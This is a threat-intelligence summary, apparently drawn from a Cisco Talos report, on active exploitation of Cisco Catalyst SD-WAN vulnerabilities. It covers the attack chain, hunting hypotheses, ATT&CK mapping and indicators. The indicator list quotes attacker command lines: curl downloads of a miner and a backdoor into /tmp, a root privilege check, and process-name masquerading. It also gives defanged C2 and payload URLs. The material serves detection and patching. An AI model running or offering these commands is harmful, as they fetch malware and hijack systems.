Skip to content
.ca
sign in
7 mincritical

Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities

Cisco Talos is tracking active exploitation of multiple vulnerabilities in Cisco Catalyst SD-WAN Controller and Manager. Threat actor UAT-8616 is exploiting CVE-2026-20182 for authentication bypass, while other clusters are chaining CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 to deploy JSP webshells and post-exploitation frameworks like Sliver and AdaptixC2.

Sens:ImmediateConf:highAnalyzed:2026-05-14Google

Authors: Cisco Talos

ActorsUAT-8616ZeroZenX LabsCluster 1Cluster 2Cluster 3Cluster 4Cluster 5Cluster 6Cluster 7Cluster 8Cluster 9Cluster 10
XenShellWebshellCVE-2026-20182UAT-8616Cisco SD-WAN

Source:Cisco Talos

IOCs · 41

Detection / HunterGoogle

What Happened

Cybersecurity researchers have identified hackers actively attacking Cisco Catalyst SD-WAN systems, which are used to manage corporate networks. The attackers are exploiting several software vulnerabilities to bypass login screens and gain full control over the affected devices. This matters because once inside, the hackers can steal sensitive credentials, install malicious software, or use the network's resources to mine cryptocurrency. Organizations using these Cisco products should immediately apply the security updates released by Cisco to protect their networks.

Key Takeaways

  • Active exploitation of CVE-2026-20182 by threat actor UAT-8616 to gain administrative privileges on Cisco Catalyst SD-WAN systems.
  • Widespread exploitation of chained vulnerabilities (CVE-2026-20133, CVE-2026-20128, CVE-2026-20122) by multiple distinct threat clusters.
  • Attackers are deploying various JSP webshells, including XenShell, Godzilla, and Behinder variants, to establish persistence.
  • Post-exploitation activities include deploying C2 frameworks (Sliver, AdaptixC2, Mythic), cryptominers (XMRig), and credential stealers.

Affected Systems

  • Cisco Catalyst SD-WAN Controller (formerly vSmart)
  • Cisco Catalyst SD-WAN Manager (formerly vManage)

Vulnerabilities (CVEs)

  • CVE-2026-20182
  • CVE-2026-20133
  • CVE-2026-20128
  • CVE-2026-20122
  • CVE-2026-20127

Attack Chain

Attackers gain initial access by exploiting vulnerabilities in Cisco Catalyst SD-WAN Manager and Controller, either via CVE-2026-20182 or a chain of CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122. Following successful exploitation, attackers deploy JSP webshells such as XenShell, Godzilla, or Behinder to establish persistence and execute arbitrary commands. Post-exploitation activities vary by cluster but include deploying C2 frameworks like Sliver and AdaptixC2, installing XMRig cryptominers, and executing scripts to steal credentials and escalate privileges to root.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: Yes
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: Snort, ClamAV

Cisco Talos has provided Snort SIDs for network-based detection of the exploits and ClamAV signatures for the associated malicious tooling.

Detection Engineering Assessment

EDR Visibility: Medium — EDR agents deployed on underlying Linux hosts can detect webshell file creation, suspicious child processes spawned from web services, and execution of known post-exploitation tools like XMRig or Sliver. Network Visibility: High — Exploitation occurs over the network targeting specific web application endpoints, and post-exploitation involves downloading payloads and communicating with external C2 servers. Detection Difficulty: Moderate — While the initial exploit targets specific paths, the variety of webshells and post-exploitation tools requires a defense-in-depth approach monitoring for anomalous web server behavior and unexpected outbound connections.

Required Log Sources

  • Web Access Logs
  • Process Creation Logs
  • Network Traffic Logs

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Consider hunting for web server processes (e.g., Tomcat, Java) spawning unexpected shell processes (bash, sh) which may indicate webshell execution.Process Creation LogsExecutionLow
Evaluate whether there are unexpected .jsp files created in web-accessible directories, particularly those with randomized or suspicious names like sysv.jsp or conf.jsp.File Creation LogsPersistenceLow
If you have network visibility, consider hunting for outbound connections from SD-WAN infrastructure to unknown or untrusted IP addresses on non-standard ports.Network Traffic LogsCommand and ControlMedium
Consider hunting for the execution of commands related to privilege escalation checks, such as 'su root -c id', originating from low-privileged user contexts.Process Creation LogsPrivilege EscalationLow

Control Gaps

  • Lack of network segmentation for management interfaces
  • Missing file integrity monitoring on web directories

Key Behavioral Indicators

  • Java/Tomcat processes spawning bash/sh
  • Creation of .jsp files in web directories
  • Execution of curl/wget to download files into /tmp
  • Processes executing with hidden or masqueraded names (e.g., exec -a '[mm_percpu_wq]')

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Apply the security updates provided by Cisco for CVE-2026-20182, CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 immediately.
  • Consider isolating affected Cisco Catalyst SD-WAN Controllers and Managers from the internet if patching cannot be performed immediately.

Infrastructure Hardening

  • Evaluate whether management interfaces for SD-WAN infrastructure can be restricted to trusted internal IP ranges or accessed only via VPN.
  • Consider implementing File Integrity Monitoring (FIM) on critical web application directories to detect unauthorized webshell deployments.

User Protection

  • Consider enforcing strict least privilege access controls for administrative accounts on SD-WAN infrastructure.

Security Awareness

  • Ensure network administrators are aware of the critical need to promptly patch edge and management infrastructure.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Server Software Component: Web Shell
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1068 - Exploitation for Privilege Escalation
  • T1003 - OS Credential Dumping
  • T1496 - Resource Hijacking

Additional IOCs

  • Ips:
    • 38[.]181[.]52[.]89 - Exploitation and webshell interaction IP (Cluster 1)
    • 89[.]125[.]244[.]33 - Exploitation and webshell interaction IP (Cluster 1)
    • 89[.]125[.]244[.]51 - Exploitation and webshell interaction IP (Cluster 1)
    • 71[.]80[.]85[.]135 - Exploitation and webshell interaction IP (Cluster 2)
    • 212[.]83[.]162[.]37 - Exploitation and webshell interaction IP (Cluster 3)
    • 38[.]60[.]214[.]92 - Attributed IP (Cluster 4)
    • 65[.]20[.]67[.]134 - Attributed IP (Cluster 4)
    • 104[.]233[.]156[.]1 - Attributed IP (Cluster 4)
    • 194[.]233[.]100[.]40 - Attributed IP (Cluster 4)
    • 79[.]135[.]105[.]208 - Attacker IP that downloaded the Nim-based backdoor
    • 176[.]65[.]139[.]31 - IP related to Nim-based backdoor and KScan activity
    • 47[.]104[.]248[.]7 - IP related to Miner activity (Cluster 9)
  • Urls:
    • hxxp://194[.]163[.]175[.]135:4445 - AdaptixC2 C2 server URL
    • mtls://23[.]27[.]143[.]170:443 - Sliver C2 over mTLS
    • hxxp://83[.]229[.]126[.]195:8081/xmrig - XMRig remote download URL
    • hxxp://83[.]229[.]126[.]195:8081/config.json - XMRig configuration file remote download URL
    • hxxps://1a820b09-95ba-44eb-b350-417e8241b725-00-1lgwuuen9b77p[.]worf[.]replit[.]dev/download - Download URL for the Nim-based backdoor
    • hxxp://13[.]62[.]52[.]206:5004 - C2 URL for Nim-based backdoor
  • File Hashes:
    • 0ed72d52347bfe4a78afff8a6982a64050c8fc86d8957a20eeb3e0f3f5342ed0 (sha256) - XMRig downloader script
    • 96fc528ca5e7d1c2b3add5e31b8797cb126f704976c8fbeaecdbf0aa4309ad46 (sha256) - XMRig sample
    • 7aa88a64a527ade7d93c20faf23b54f2ee33ad9b1246cdc2f8ded2ab639affb1 (sha256) - XMRig configuration
    • 18d77c9c5bbb5b9d5bdfd366fdfcf26bad9e64c63ca865fad711bcce8e3d5a80 (sha256) - KScan scanning tool
    • d94f75a70b5cabaf786ac57177ed841732e62bdcc9a29e06e5b41d9be567bcfa (sha256) - gsocket tool
    • 5bc5998161056b7c8f70c9724d8a63abc7ff8c3843b91c30cffab0899e39b7f8 (sha256) - gsocket secret file
    • b0f51b098842cd630097b462aab0ec357e2c7824af37cca6d08165265da2c2d3 (sha256) - vManage credential extractor script
    • 72f570ce97de3eaaffef33d90b0c337a153fc9690cc34ee207b557d868360060 (sha256) - Check for root escalation script
    • 17302d903baf182f94dc3be40ab1e0874dd0eb2ec5255bf9131fd53591efe925 (sha256) - Check for root escalation script
  • Command Lines:
    • Purpose: Downloading XMRig payload and configuration via curl | Tools: curl, bash | Stage: Execution | curl -sL -o /tmp/xmrig
    • Purpose: Downloading Nim-based backdoor (agent1) via curl | Tools: curl, bash | Stage: Execution | curl -s https://... -o /tmp/agent1
    • Purpose: Executing privilege escalation check using hardcoded credentials | Tools: su | Stage: Privilege Escalation | su root -c id
    • Purpose: Executing XMRig miner in the background | Tools: bash | Stage: Execution | /tmp/moneroocean/miner.sh --config=/tmp/moneroocean/config_background.json
    • Purpose: Executing gsocket tool with masqueraded process name | Tools: bash, pkill | Stage: Defense Evasion | exec -a '[mm_percpu_wq]' '/tmp/.config/htop/defunct'
  • Other:
    • conf.jsp - Behinder webshell variant filename
    • sysinit.jsp - Behinder webshell variant filename
    • vmurnp_ikp.jsp - Godzilla webshell variant filename
    • systemd-resolved - AdaptixC2 payload filename
    • CWan - Sliver payload filename
    • agent1 - Nim-based backdoor filename
    • defunct.dat - gsocket configuration filename
    • loot_run.sh - Credential stealer script filename

Related